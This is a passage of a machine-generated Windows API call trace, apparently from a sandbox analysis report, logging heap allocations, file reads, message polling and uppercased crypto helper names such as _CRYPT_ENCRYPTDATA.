Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0038.134] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0038.134] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0038.134] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0038.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0038.135] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0038.135] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0038.137] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x6f92, lpOverlapped=0x0) returned 1 [0038.137] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0038.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x16f92) returned 0xac0018 [0038.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0038.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0038.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x16f92) returned 0x935008 [0038.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.141] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0038.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x16f92) returned 0xac0018 [0038.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0038.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.141] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0038.141] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.141] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0038.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0038.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x16f92) returned 0xac0018 [0038.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0038.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0038.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0038.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c790 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0038.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x16f92) returned 0x94bfa8 [0038.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0038.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0038.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.144] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0038.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0038.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0038.144] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0038.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0038.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.144] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0038.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da328 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0038.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0038.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889958 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0038.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.145] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0038.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0038.145] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0038.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0038.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0038.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0038.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0038.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0038.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0038.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0038.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0038.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0038.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0038.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.146] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0038.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0038.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0038.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0038.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0038.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0038.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0038.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0038.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0038.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0038.147] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0038.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0038.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0038.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0038.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0038.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.147] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0038.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cec8 [0038.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.147] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0038.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0038.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0038.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0038.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, 